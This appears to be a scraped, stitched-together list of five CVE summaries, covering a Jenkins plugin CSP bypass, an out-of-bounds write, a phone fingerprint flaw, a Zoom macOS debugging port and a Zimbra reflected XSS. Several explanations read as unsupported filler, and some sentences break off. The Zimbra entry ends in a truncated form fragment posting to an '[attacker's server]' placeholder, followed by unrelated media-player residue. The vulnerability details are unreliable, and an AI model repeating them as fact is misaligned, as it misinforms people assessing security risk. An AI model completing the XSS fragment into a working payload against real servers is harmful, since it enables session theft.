CVE-2022-43432 Jenkins XFramium Builder Plugin 1.0.22 and earlier disables Content-Security-Policy protection for user-generated content.
This can be dangerous if you host public download sites for example, or allow third party code to be hosted on your servers via Git.
CVE-2021-0699 An out of bounds write in HTBLogKM could lead to local escalation of privilege in the kernel.
This issue exists because of a bug in the implementation of the bounds check. It can be exploited after gaining access to a privileged process.
CVE-2022-41595 The phones have the fingerprint vulnerability. Successful exploitation may affect the fingerprint service.
A local attacker may access and control the smart phone or read personal data from it.
Vulnerability overview
A vulnerability in the Android operating system
CVE-2022-28762 The Zoom Client for Meetings for Macs starting with 5.10.6 has a misconfiguration of a debugging port.
This could be used for example to launch other malware or perform other potentially unwanted actions. Zoom for meetings is a collaborative presentation and meeting
CVE-2022-41349 An attachUrl parameter in ZCS 8.8.15 is vulnerable to Reflected XSS.
The attached file must be uploaded through the administration interface. Consider the following example.
form action="http://[attacker's server]:8080/h/compose?
Episode
00:00:00
00:00:00